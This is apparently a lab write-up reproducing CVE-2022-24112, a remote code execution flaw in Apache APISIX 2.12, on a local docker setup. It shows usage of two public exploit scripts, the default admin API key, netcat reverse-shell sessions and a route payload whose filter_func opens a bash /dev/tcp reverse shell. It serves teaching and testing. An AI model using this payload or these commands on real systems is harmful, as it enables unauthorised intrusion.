Let's clone using gitclone this repository, then we can navigate to apisix-docker/examples. In this docker-compose.yml file, we already change into image: apache/apisix:2.12.0-alpine, because the vulnerability in this version, then let's install using docker compose.
QuickStart via docker-compose,we can start all modules with docker-compose.
$ cd example
$ docker-compose -p docker-apisix up -dLet's use this command docker ps -a to make sure the docker images already runs in the background. after this is done, we can access the API with a simple curl
$ curl 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' -i
HTTP/1.1 200 OK
Date: Sun, 20 Mar 2022 15:49:17 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Server: APISIX/2.12.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
Access-Control-Max-Age: 3600
{"count":0,"action":"get","node":{"key":"\/apisix\/routes","nodes":{},"dir":true}}poc.py. exploit usagepython3 50829.py http://127.0.0.1:9080/ 172.18.0.1 4444
$ python3 50829.py http://127.0.0.1:9080/ 172.18.0.1 4444
. ,
_.._ * __*\./ ___ _ \./._ | _ *-+-
(_][_)|_) |/'\ (/,/'\[_)|(_)| |
| |
(CVE-2022-24112)
{ Coded By: Ven3xy | Github: https://github.com/M4xSec/ }
reverse shell connection
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [172.18.0.1] from (UNKNOWN) [172.19.0.8] 52334
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
pwd
/usr/local/apisix
ls -la
total 52
drwxr-xr-x 1 root root 4096 Mar 20 15:48 .
drwxr-xr-x 1 root root 4096 Jan 28 09:06 ..
drwxr-xr-x 13 root root 4096 Jan 28 09:07 apisix
drwx------ 2 nobody root 4096 Mar 20 15:48 client_body_temp
drwxr-xr-x 1 root root 4096 Mar 20 15:48 conf
drwxr-xr-x 5 root root 4096 Jan 28 09:07 deps
drwx------ 2 nobody root 4096 Mar 20 15:48 fastcgi_temp
drwxr-xr-x 2 1000 1000 4096 Mar 20 15:48 logs
drwx------ 2 nobody root 4096 Mar 20 15:48 proxy_temp
drwx------ 2 nobody root 4096 Mar 20 15:48 scgi_temp
drwx------ 2 nobody root 4096 Mar 20 15:48 uwsgi_temppoc2.py. exploit usagepython3 poc2.py -h
$ python3 poc2.py -h
>> Apache APISIX 2.12.1 - Remote Code Execution (RCE)
>> by twseptian
usage: poc2.py [-h] -t TARGET_IP -p TARGET_PORT -L LOCALHOST -P LOCALPORT
Apache APISIX 2.12.1 - Remote Code Execution (RCE)
optional arguments:
-h, --help show this help message and exit
-t TARGET_IP, --rhost TARGET_IP
Target IP
-p TARGET_PORT, --rport TARGET_PORT
Target Port
-L LOCALHOST, --lhost LOCALHOST
Localhost/Local IP
-P LOCALPORT, --lport LOCALPORT
Localportexploit usage python3 poc2.py -t 127.0.0.1 -p 9080 -L 172.18.0.1 -P 4444
$ python3 poc2.py -t 127.0.0.1 -p 9080 -L 172.18.0.1 -P 4444
>> Apache APISIX 2.12.1 - Remote Code Execution (RCE)
>> by twseptian
[!] Take RCE
listening on [any] 4444 ...
connect to [172.18.0.1] from (UNKNOWN) [172.19.0.8] 52372
id
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
pwd
/usr/local/apisix
ls -la
total 52
drwxr-xr-x 1 root root 4096 Mar 20 15:48 .
drwxr-xr-x 1 root root 4096 Jan 28 09:06 ..
drwxr-xr-x 13 root root 4096 Jan 28 09:07 apisix
drwx------ 2 nobody root 4096 Mar 20 15:48 client_body_temp
drwxr-xr-x 1 root root 4096 Mar 20 15:48 conf
drwxr-xr-x 5 root root 4096 Jan 28 09:07 deps
drwx------ 2 nobody root 4096 Mar 20 15:48 fastcgi_temp
drwxr-xr-x 2 1000 1000 4096 Mar 20 15:48 logs
drwx------ 2 nobody root 4096 Mar 20 15:48 proxy_temp
drwx------ 2 nobody root 4096 Mar 20 15:48 scgi_temp
drwx------ 2 nobody root 4096 Mar 20 15:48 uwsgi_temp$ curl -s 'http://127.0.0.1:9080/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1' | jq
{
"count": 1,
"action": "get",
"node": {
"key": "/apisix/routes",
"nodes": [
{
"modifiedIndex": 161,
"value": {
"priority": 0,
"uri": "/rms/fzxewh",
"status": 1,
"upstream": {
"hash_on": "vars",
"pass_host": "pass",
"nodes": {
"schmidt-schaefer.com": 1
},
"type": "roundrobin",
"scheme": "http"
},
"id": "index",
"create_time": 1647791428,
"filter_func": "function(vars) os.execute('bash -c \\\"0<&160-;exec 160<>/dev/tcp/172.18.0.1/4444;/bin/sh <&160 >&160 2>&160\\\"'); return true end",
"update_time": 1647799320,
"name": "wthtzv"
},
"key": "/apisix/routes/index",
"createdIndex": 16
}
],
"dir": true
}
}